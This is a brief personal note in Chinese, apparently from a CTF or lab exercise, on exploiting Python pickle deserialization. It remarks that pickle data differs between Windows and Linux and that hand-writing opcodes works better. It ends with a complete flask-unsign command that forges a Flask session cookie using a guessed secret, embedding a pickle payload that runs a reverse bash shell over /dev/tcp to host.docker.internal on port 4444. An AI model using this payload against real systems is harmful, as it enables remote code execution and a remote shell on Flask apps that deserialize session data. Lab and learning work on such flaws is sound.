pickle

Windows和Linux pickle序列化数据不同
直接用opcode确实要好点
晚点去学一下opcode,然后再基于Masterlin的脚本写一个图形化工具

flask-unsign --sign --cookie "{'notes': {'evil': b'''cos\nsystem\n(S'bash -c \"bash -i >& /dev/tcp/host.docker.internal/4444 0>&1\"'\ntR.'''}}" --secret 6061 --no-literal-eval